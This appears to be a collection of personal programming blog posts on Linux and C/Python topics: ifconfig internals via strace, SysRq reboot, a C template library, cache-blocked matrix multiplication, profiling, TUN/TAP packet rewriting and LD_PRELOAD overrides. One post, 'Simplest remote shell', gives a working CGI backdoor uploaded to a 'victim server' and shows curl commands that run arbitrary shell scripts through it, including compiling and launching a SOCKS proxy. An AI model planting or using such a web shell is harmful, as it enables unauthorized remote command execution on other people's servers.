          RX packets:791580 errors:0 dropped:0 overruns:0 frame:0
          TX packets:381581 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:468681235 (446.9 Mb)  TX bytes:47469801 (45.2 Mb)
          Interrupt:18 Base address:0xc000

What does ifconfig do to get this info?
strace /sbin/ifconfig eth1
...
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
...
ioctl(4, SIOCGIFBRDADDR, {ifr_name="eth1", ifr_broadaddr={AF_INET, inet_addr("192.168.44.255")}}) = 0
...

strace shows that descriptor 4 is passed to ioctl. In python one can do the same
# get the constant beforehand
grep -R SIOCGIFBRDADDR /usr/include/*
/usr/include/bits/ioctls.h:#define SIOCGIFBRDADDR 0x8919 /* get broadcast PA address */

import fcntl, socket, struct
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_IP)
SIOCGIFBRDADDR = 0x8919
iface = struct.pack('256s', 'eth1')
info = fcntl.ioctl(s.fileno(), SIOCGIFBRDADDR, iface)
socket.inet_ntoa(info[20:24])
'192.168.44.255'

Why do we take bytes 20 to 24? One passes struct ifreq to ioctl (see netdevice(7)): IFNAMSIZ is 16, plus offsetof(struct sockaddr_in, sin_addr), which gives 20, and the address itself is an unsigned long, 4 bytes.
struct ifreq {
    char ifr_name[IFNAMSIZ]; /* Interface name */
    union {
        struct sockaddr ifr_addr;
        struct sockaddr ifr_dstaddr;
        struct sockaddr ifr_broadaddr;
        struct sockaddr ifr_netmask;
        struct sockaddr ifr_hwaddr;
        short           ifr_flags;
        int             ifr_ifindex;
        int             ifr_metric;
        int             ifr_mtu;
        struct ifmap    ifr_map;
        char            ifr_slave[IFNAMSIZ];
        char            ifr_newname[IFNAMSIZ];
        char           *ifr_data;
    };
};

struct sockaddr_in {
    short          sin_family;
    unsigned short sin_port;
    struct in_addr sin_addr;
    char           sin_zero[8];
};

struct in_addr {
    unsigned long s_addr;
};

Note, there are no holes in these structs. One might expect a 4-byte hole before sin_addr on 64-bit systems, but there is none: the structures are declared in a way that avoids holes. A simple test to show this
#include <stdio.h>
#include <stddef.h>
#include <netinet/in.h>

struct in_addr2 {
    unsigned long s_addr;
};

struct sockaddr_in2 {
    short           sin_family;
    unsigned short  sin_port;
    struct in_addr2 sin_addr;
    char            sin_zero[8];
};

int main(void)
{
    printf("%d\n", offsetof(struct sockaddr_in, sin_addr));
    printf("%d\n", offsetof(struct sockaddr_in2, sin_addr));
    return 0;
}

gcc 1.c
./a.out
4
8

With the help of strace you can find out a lot about utilities; one more example
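The [20:24] slice used in the Python snippet above can also be re-derived with struct itself. A small sanity check of mine, not from the original post:

```python
import struct

# ifr_name occupies IFNAMSIZ (16) bytes; inside the embedded
# struct sockaddr_in, sin_addr sits after sin_family (short) and
# sin_port (unsigned short), i.e. at offset 4. Hence 16 + 4 = 20,
# and the IPv4 address itself is 4 bytes: slice [20:24].
IFNAMSIZ = 16
sin_addr_offset = struct.calcsize("hH")  # short + unsigned short, no padding
start = IFNAMSIZ + sin_addr_offset
end = start + 4                          # an IPv4 address is 4 bytes
print(start, end)
```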
strace ps
...
open("/proc", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 5
fcntl(5, F_GETFD) = 0x1 (flags FD_CLOEXEC)
getdents64(5, /* 211 entries */, 32768) = 5552
stat("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/1/stat", O_RDONLY) = 6
read(6, "1 (init) S 0 1 1 0 -1 4202752 31"..., 1023) = 187
close(6) = 0
open("/proc/1/status", O_RDONLY) = 6
read(6, "Name:\tinit\nState:\tS (sleeping)\nT"..., 1023) = 675
close(6)
stat("/proc/2", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
...

So, the advice: do not parse output from system utilities, it is not a reliable thing to do and it is subject to change. Use ioctl, sysctl, /proc, etc. to gather the info you need, and use strace and the like to find out where it comes from.
P.S. The funniest bug I've seen is when one mixed stdout and stderr and got every time new result upon parsing due to two streams are mixed in an unpredictable way. The other one was due to i18n feature.
Linux, reboot --force
If you cannot reboot your system (e.g. cannot umount some device due to its malfunction, or due to a network loss while working with a remote hard drive), use the Magic SysRq key
The magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low level commands regardless of the system's state.

The kernel must have been compiled with CONFIG_MAGIC_SYSRQ
cat /boot/config-`uname -r` | grep CONFIG_MAGIC_SYSRQ
CONFIG_MAGIC_SYSRQ=y

To actually reboot
echo 1 > /proc/sys/kernel/sysrq
echo b > /proc/sysrq-trigger
Best template lib for C
You've seen or heard about Clearsilver, CTPP, and libctemplate. But the best template lib with the true C spirit is libtemplate
Using templates in PHP and C++ has spoiled me. So when I started developing applications in C, I went hunting for a templating library that I could use again. I didn't find it, so after developing in a mixture of C for my lowlevel routines and C++ for my interface, I finally broke down and wrote a templating engine in C. (See Free HTML Template Engine.)

An example
#include "template.h"

int main(void)
{
    struct tpl_engine *engine;
    int n;
    char n1[10], n2[10], n3[10];

    engine = tpl_engine_new();

    /* Load the template file */
    tpl_file_load(engine, "test.tpl");

    for (n = 1; n <= 10; n++) {
        sprintf(n1, "%d", n);
        sprintf(n2, "%d", n*n);
        sprintf(n3, "%d", n*n*n);
        tpl_element_set(engine, "n", n1);
        tpl_element_set(engine, "n2", n2);
        tpl_element_set(engine, "n3", n3);
        /* Parse the template 'row' and add the result to element 'rows' */
        tpl_parse(engine, "row", "rows", 1);
    }
    tpl_parse(engine, "grid", "main", 0);
    printf("%s", tpl_element_get(engine, "main"));
    return 0;
}

test.tpl
<template name="grid">
<table>
<tr>
<th>n</th>
<th>nˆ2</th>
<th>nˆ3</th>
</tr>
{rows}
</table>
</template>

<template name="row">
<tr>
<td>{n}</td>
<td>{n2}</td>
<td>{n3}</td>
</tr>
</template>
Don't optimize when you are not asked to
The code below, as you may guess, multiplies two matrices (see Ulrich Drepper, What Every Programmer Should Know About Memory)
for (i = 0; i < N; ++i)
    for (j = 0; j < N; ++j)
        for (k = 0; k < N; ++k)
            res[i][j] += mul1[i][k] * mul2[k][j];

The next piece of code does the same (as you probably may not guess anymore)
#define SM (CLS / sizeof (double))

for (i = 0; i < N; i += SM)
    for (j = 0; j < N; j += SM)
        for (k = 0; k < N; k += SM)
            for (i2 = 0, rres = &res[i][j], rmul1 = &mul1[i][k];
                 i2 < SM;
                 ++i2, rres += N, rmul1 += N)
                for (k2 = 0, rmul2 = &mul2[k][j];
                     k2 < SM;
                     ++k2, rmul2 += N)
                    for (j2 = 0; j2 < SM; ++j2)
                        rres[j2] += rmul1[k2] * rmul2[j2];

where CLS is the line size of the L1d cache
gcc -DCLS=$(getconf LEVEL1_DCACHE_LINESIZE) ...

The speed
           Original        Tuned
Cycles     16,765,297,870  2,895,041,480
Relative   100%            17.3%
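The blocking idea itself is easy to see in any language. Below is a toy Python sketch of mine (not from the paper): both functions compute the same product, only the traversal order differs, and in C that traversal order is exactly what makes the blocked version cache-friendly. In Python the speedup is of course not visible; the point is the loop shape.

```python
N, SM = 8, 4  # SM would be CLS / sizeof(double) in the C version

def matmul_naive(a, b):
    res = [[0.0] * N for _ in range(N)]
    for i in range(N):
        for j in range(N):
            for k in range(N):
                res[i][j] += a[i][k] * b[k][j]
    return res

def matmul_blocked(a, b):
    # Walk the matrices in SM x SM tiles so the working set of each
    # innermost pass stays small, mirroring the C code above.
    res = [[0.0] * N for _ in range(N)]
    for i in range(0, N, SM):
        for j in range(0, N, SM):
            for k in range(0, N, SM):
                for i2 in range(i, i + SM):
                    for k2 in range(k, k + SM):
                        for j2 in range(j, j + SM):
                            res[i2][j2] += a[i2][k2] * b[k2][j2]
    return res
```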
But the main difference, as the author says, is
This looks quite scary.
This smacks of premature optimisation and the possibility the user really does not know what they are talking about, not to mention the problem of portability.

See Why not cache lines.
Fundamentals, C arrays and pointers
Why are C arrays not pointers? Well, by definition
In C, there is a strong relationship between pointers and arrays, strong enough that pointers and arrays should be discussed simultaneously. (K&R)

They are easy to mix up
When an array name is passed to a function, what is passed is the location of the initial element. (K&R)

An example
#include <stdio.h>

void func(char subarray[100], char* pointer)
{
    printf("sizeof subarray=%zd\n", sizeof(subarray));
    printf("address of subarray=%p\n", (void *)subarray);
    printf("pointer=%p\n", (void *)pointer);
}

int main()
{
    char array[100];

    printf("sizeof of array=%zd\n", sizeof(array));
    printf("address of array=%p\n", (void *)array);
    printf("address of array[0]=%p\n", (void *)&array[0]);
    func(array, array);
}
// ----------------------------------------
sizeof of array=100
address of array=0xbfbfe760
address of array[0]=0xbfbfe760
sizeof subarray=4
address of subarray=0xbfbfe760
pointer=0xbfbfe760
Python, profiling
'Have you seen python web developers who do high-load site development for a living?'
'Oh, almost all of them do such things,' you say.
'Have you seen python devs who know how to debug?'
'A few,' you say.
'Have you seen python devs who profile things that are supposed to be highly loaded?'
Python has cProfile, C has kcachegrind, they look good together.
For instance, let's profile a multithreaded wsgi app. Change your handler
def read(self, request, *args, **kwargs):
    ...
    return ...

To something like
def read(self, *args, **kwargs):
    import cProfile
    import uuid
    cProfile.runctx('self.read2(*args, **kwargs)', globals(), locals(),
                    '/folder_with_stats/' + uuid.uuid4().get_hex())
    return self.__res

def read2(self, *args, **kwargs):
    self.__res = self.read3(*args, **kwargs)

def read3(self, request, *args, **kwargs):
    ...
    return ...

Then (high) load your app. Gather results from folder_with_stats
import os
import pstats
import time

from pyprof2calltree import convert

# Collect stats
p = None
for i in os.listdir('/folder_with_stats'):
    filename = '/folder_with_stats/' + i
    if not p:
        p = pstats.Stats(filename)
    else:
        p.add(filename)
    os.unlink(filename)

res = str(int(time.time())) + '.kgrind'
convert(p, res)
os.execlp('kcachegrind', res)

The main thing here to note is pyprof2calltree.
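If you don't have a pile of stat files from a loaded app around, here is a self-contained toy version of the same aggregation step (my own sketch): profile a function several times into separate files, then merge them with pstats. pyprof2calltree/kcachegrind would consume the merged stats next.

```python
import cProfile
import os
import pstats
import tempfile

def busy():
    return sum(i * i for i in range(10000))

folder = tempfile.mkdtemp()
# simulate several requests, each profiled into its own file
for n in range(3):
    cProfile.runctx("busy()", globals(), locals(),
                    os.path.join(folder, "run%d" % n))

# merge all stat files into one pstats.Stats object
merged = None
for name in os.listdir(folder):
    path = os.path.join(folder, name)
    if merged is None:
        merged = pstats.Stats(path)
    else:
        merged.add(path)
    os.unlink(path)

print(merged.total_calls)  # total profiled calls across the three runs
```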
If you want httperf with libev on board
ab eats CPU, and so does httperf. Use weighttp
weighttp -n 1000000 -c 100 -t 10 -k http://localhost/
Reminder, download big files via ssh
When downloading (or uploading) a big enough file via ssh, scp is not the best solution, since after a termination one needs to resume the transfer.
Solution
rsync --inplace -P -e "ssh -i key.pem" IN OUT

Note the --inplace parameter.
Signals and threads in python
The task: start a set of processes and wait till they terminate, if SIGTERM is received send same signal to all child processes and again wait till they terminate. (Ok, I'd go with sending signal to the process group, but however.)
The naive solution: use the subprocess and threading modules, start a thread per child process and communicate(), and in the main thread join() with the others. Why naive? This doesn't work: the signal handler is not invoked. The documentation for the signal module says:
Although Python signal handlers are called asynchronously as far as the Python user is concerned, they can only occur between the "atomic" instructions of the Python interpreter. This means that signals arriving during long calculations implemented purely in C (such as regular expression matches on large bodies of text) may be delayed for an arbitrary amount of time.

That is, the signal handler will be processed only after the current "atomic" operation finishes. Unfortunately, join() is one of such atomic operations. In other words, the signal handler will be invoked only after the thread terminates.
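One workaround (my sketch, not from the post) is to replace the blocking join() with a polling join(timeout): the main thread then wakes up regularly, and pending Python signal handlers get a chance to run between the joins:

```python
import signal
import threading
import time

got_signal = []

def handler(signum, frame):
    got_signal.append(signum)

signal.signal(signal.SIGALRM, handler)

worker = threading.Thread(target=time.sleep, args=(2,))
worker.start()
signal.alarm(1)  # deliver SIGALRM to ourselves in 1 second

# join with a timeout instead of a bare join(): the main thread wakes
# up periodically, letting the Python-level signal handler run.
while worker.is_alive():
    worker.join(0.2)

print(got_signal)  # the handler ran while we were "joining"
```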
Another way is to use coroutines and select:
proc = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT,
                        close_fds=True,
                        preexec_fn=preexec_fn)
fdesc = proc.stdout.fileno()
flags = fcntl.fcntl(fdesc, fcntl.F_GETFL)
fcntl.fcntl(fdesc, fcntl.F_SETFL, flags | os.O_NONBLOCK)
while True:
    try:
        dt = proc.stdout.read()
        if dt == '':
            break
        yield dt
    except IOError:
        # EWOULDBLOCK
        yield ''
        try:
            select.select([proc.stdout], [], [], 1)
        except select.error:
            # select.error: (4, 'Interrupted system call') - ignore it,
            # just call select again
            pass
while True:
    try:
        proc.wait()
        break
    except OSError:
        # OSError: [Errno 4] Interrupted system call
        continue

And the supervisor (left is an array of generators made from the coroutines)
while left:
    new_left = []
    for execute in left:
        try:
            execute.next()
            new_left.append(execute)
        except StopIteration:
            pass
        except Exception, e:
            err = e
    left = new_left

Also note that EINTR in general is not handled by the python standard library; it is just forwarded up the stack, as in C. In most cases, if you are lucky, it is enough to call the interrupted routine again, as in C (but C guarantees that this works; python doesn't).
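A minimal retry helper in the spirit of that note (my own sketch; note that CPython 3.5+ retries EINTR by itself, per PEP 475, so this matters mostly on older interpreters):

```python
import errno

def retry_on_eintr(func, *args):
    # Repeat the call while it keeps failing with EINTR; re-raise
    # any other error untouched.
    while True:
        try:
            return func(*args)
        except (OSError, IOError) as e:
            if e.errno != errno.EINTR:
                raise

# toy demonstration: fail with EINTR twice, then succeed
state = {"n": 0}

def flaky():
    if state["n"] < 2:
        state["n"] += 1
        raise OSError(errno.EINTR, "Interrupted system call")
    return "done"

print(retry_on_eintr(flaky))
```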
Python, how to open TUN/TAP device
Just a note in case I forget
import os
import struct
from fcntl import ioctl

def open(n):
    TUNSETIFF = 0x400454ca
    IFF_TUN = 0x0001
    IFF_TAP = 0x0002
    TUNMODE = IFF_TAP

    f = os.open("/dev/net/tun", os.O_RDWR)
    ifs = ioctl(f, TUNSETIFF, struct.pack("16sH", "tap%d" % n, TUNMODE))
    #ifname = ifs[:16].strip("\x00")
    return f

And then as usual
f1 = open(1)
f2 = open(2)
p = os.read(f1, 65000)
os.write(f2, p)
os.close(f1)
os.close(f2)
Friday, December 20, 2013
Programming TUN/TAP in Linux, changing IP address on the fly
So you want to map one network to another by implementing your very own bridge that changes the network in the IP packets it receives and forwards them to the other segment. Why not, I say, could be.
The plan is
- Create 2 tap interfaces: tap1 and tap2.
- Bridge tap1 with eth0 (i.e. everything that reaches tap1 is being forwarded to eth0 by kernel and vice versa).
- Application gets packets from tap2, changes src and dst IP addresses (changes network 10.0.0.0/24 to 192.168.14.0/24) and writes resulting packet to tap1 (then to eth0 and to the wires).
- When application gets response from eth0 (tap1) it substitutes IPs again and writes to tap2.
For more information on TUN/TAP try to read Universal TUN/TAP device driver Frequently Asked Question.
In this way if you are in 192.168.14.0/24 network and want to speak with 192.168.14.15 after small manipulations you can speak with that host as if it had address 10.0.0.15.
The instructions and program itself without any further comments are below.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/uio.h>
#include <net/if.h>
#include <linux/if_tun.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/select.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>

/* Replace IP addresses in packets on the L2 level.

   Setup:
     tunctl -t tap1
     tunctl -t tap2
     brctl addif br1 tap1
     brctl addif br1 eth0
     ifconfig tap1 promisc up
     ifconfig tap2 promisc up
     ifconfig tap2 10.0.1.18 netmask 255.255.255.0

   Send packets to 10.0.0.0/24 on tap2, they will appear as
   192.168.14.0/24 on eth0. Note that these values are hardcoded
   in main. */

static int tun_alloc_old(char *dev)
{
    char tunname[IFNAMSIZ];

    sprintf(tunname, "/dev/%s", dev);
    return open(tunname, O_RDWR);
}

static int tun_alloc(char *dev)
{
    struct ifreq ifr;
    int fd;
    int err;

    if ((fd = open("/dev/net/tun", O_RDWR)) < 0)
        return tun_alloc_old(dev);

    memset(&ifr, 0, sizeof(ifr));
    /* Flags: IFF_TUN   - TUN device (no Ethernet headers)
     *        IFF_TAP   - TAP device
     *        IFF_NO_PI - Do not provide packet information */
    ifr.ifr_flags = IFF_TAP;
    if (*dev)
        strncpy(ifr.ifr_name, dev, IFNAMSIZ);
    if ((err = ioctl(fd, TUNSETIFF, (void*)&ifr)) < 0) {
        close(fd);
        perror("TUNSETIFF");
        return err;
    }
    strcpy(dev, ifr.ifr_name);
    return fd;
}

static size_t write2(int fildes, const void *buf, size_t nbyte)
{
    int ret;
    size_t n;

    n = nbyte;
    while (n > 0) {
        ret = write(fildes, buf, nbyte);
        if (ret < 0)
            return ret;
        n -= ret;
        buf += ret;
    }
    return nbyte;
}

static uint16_t ipcheck(uint16_t *ptr, size_t len)
{
    uint32_t sum;
    uint16_t answer;

    sum = 0;
    while (len > 1) {
        sum += *ptr++;
        len -= 2;
    }
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

static uint16_t check2(struct iovec *iov, int iovcnt)
{
    long sum;
    uint16_t answer;
    struct iovec *iovp;

    sum = 0;
    for (iovp = iov; iovp < iov + iovcnt; iovp++) {
        uint16_t *ptr;
        size_t len;

        ptr = iovp->iov_base;
        len = iovp->iov_len;
        while (len > 1) {
            sum += *ptr++;
            len -= 2;
        }
        if (len == 1) {
            u_char t[2];
            t[0] = (u_char)*ptr;
            t[1] = 0;
            sum += (uint16_t)*t;
        }
    }
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

static void tcpcheck(struct iphdr *iph, struct tcphdr *tcph, size_t len)
{
    struct iovec iov[5];
    u_char t[2];
    uint16_t l;

    /* pseudo header: src, dst, zero+protocol, tcp length, then the
     * tcp segment itself */
    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;
    l = htons(tcph->doff * 4 + len);
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;
    iov[4].iov_base = tcph;
    iov[4].iov_len = tcph->doff * 4 + len;
    tcph->check = 0;
    tcph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}

static void udpcheck(struct iphdr *iph, struct udphdr *udph)
{
    struct iovec iov[5];
    u_char t[2];
    uint16_t l;

    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;
    l = udph->len;
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;
    iov[4].iov_base = udph;
    iov[4].iov_len = ntohs(udph->len);
    udph->check = 0;
    udph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}

static int substitute(u_char* buf, ssize_t n, u_char* net1, u_char* net2)
{
    if (buf[12] == 8 && buf[13] == 6) {
        /* ARP */
        u_char *arp;

        arp = buf + 14;
        /* replace ip */
        if (!memcmp(arp + 14, net1, 3)) {
            memcpy(arp + 14, net2, 3);
        }
        if (!memcmp(arp + 24, net1, 3)) {
            memcpy(arp + 24, net2, 3);
        }
    } else if (buf[12] == 8 && buf[13] == 0) {
        /* IP */
        struct iphdr *iph;
        size_t len;

        iph = (struct iphdr*)(buf + 14);
        len = iph->ihl * 4;
        /* clear crc */
        iph->check = 0;
        /* replace ip */
        if (!memcmp(&iph->saddr, net1, 3)) {
            memcpy(&iph->saddr, net2, 3);
        }
        if (!memcmp(&iph->daddr, net1, 3)) {
            memcpy(&iph->daddr, net2, 3);
        }
        /* put new crc */
        iph->check = ipcheck((uint16_t*)iph, len);
        if (iph->protocol == 6) {
            struct tcphdr *tcph;
            tcph = (struct tcphdr*)((u_char*)iph + len);
            tcpcheck(iph, tcph, n - ((u_char*)tcph - buf) - tcph->doff * 4);
        } else if (iph->protocol == 17) {
            struct udphdr *udph;
            udph = (struct udphdr*)((u_char*)iph + len);
            udpcheck(iph, udph);
        }
    }
    return 0;
}

int main(int argc, char **argv)
{
    int tap1;
    int tap2;
    int maxfd;
    char tunname[IFNAMSIZ];
    u_char buf[15000];
    ssize_t n;
    u_char net1[] = {192, 168, 14};
    u_char net2[] = {10, 0, 1};

    strcpy(tunname, "tap1");
    if ((tap1 = tun_alloc(tunname)) < 0) {
        goto error;
    }
    strcpy(tunname, "tap2");
    if ((tap2 = tun_alloc(tunname)) < 0) {
        goto error;
    }
    maxfd = (tap1 > tap2) ? tap1 : tap2;
    while (1) {
        int ret;
        fd_set rd_set;

        FD_ZERO(&rd_set);
        FD_SET(tap1, &rd_set);
        FD_SET(tap2, &rd_set);
        ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL);
        if (ret < 0 && errno == EINTR) {
            continue;
        }
        if (ret < 0) {
            perror("select()");
            goto error;
        }
        if (FD_ISSET(tap1, &rd_set)) {
            n = read(tap1, buf, sizeof(buf));
            if (n < 0) goto error;
            if (substitute(buf, n, net1, net2)) goto error;
            if (write2(tap2, buf, n) < 0) goto error;
        }
        if (FD_ISSET(tap2, &rd_set)) {
            n = read(tap2, buf, sizeof(buf));
            if (n < 0) goto error;
            if (substitute(buf, n, net2, net1)) goto error;
            if (write2(tap1, buf, n) < 0) goto error;
        }
    }
    close(tap1);
    close(tap2);
    return 0;

error:
    return 1;
}
Simplest remote shell
Any true webmaster has at least once installed some remote shell (backdoor) on a victim server. I've used the simplest backdoor that ever existed.
First create a file sh.cgi and upload it to the victim server (don't forget to set execute permissions)
#!/bin/sh
/bin/sh

That is the whole remote shell implementation. Locally create a file, let's say with the name 1
echo -e "Content-Type: text/plain\r\n\r"
uname -a
id
exit 0

Test it
> curl --data-binary @1 http://host/sh.cgi
Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

If you are lucky you can upload files, compile them and run them
echo -e "Content-Type: text/plain\r\n\r"
cc socks.c 2>&1
./a.out 2>&1
exit 0

Download socks.c. It implements SOCKS5; the addresses are hardcoded.
Erlang, how to change backlog in http inets server
Moving my very old posts from the old engine, I've found an interesting problem: increasing the backlog from 128, which is inappropriate for a loaded system, to something more suitable. Long ago (in 2010) the only way I found to do this was to apply the following patch
> diff -u /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl http_transport.erl
--- /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl 2010-09-28 12:45:42.000000000 +0300
+++ http_transport.erl 2010-12-08 17:57:42.759407719 +0200
@@ -218,7 +218,7 @@
 get_socket_info(Addr, Port) ->
     Key = list_to_atom("httpd_" ++ integer_to_list(Port)),
-    BaseOpts = [{backlog, 128}, {reuseaddr, true}],
+    BaseOpts = [{backlog, 10000}, {reuseaddr, true}],
     IpFamilyDefault = ipfamily_default(Addr, Port),
     case init:get_argument(Key) of
         {ok, [[Value]]} ->

I wonder whether this is still true.
Override function in shared library
Let's override write() in libc
#define _GNU_SOURCE /* for RTLD_NEXT */
#include <dlfcn.h>
#include <unistd.h>

static ssize_t (*libc_write)(int, const void *, size_t);

void init(void) __attribute__((constructor));

void init(void)
{
    libc_write = dlsym(RTLD_NEXT, "write");
}

ssize_t write(int fd, const void *buf, size_t count)
{
    /* do what you want here */
    return libc_write(fd, buf, count);
}

Then one needs to assemble the .so and put it earlier than libc.so, something like
LD_PRELOAD=/path/to/so/with/our/write.so victim_program

See Function Attributes, dlsym(3).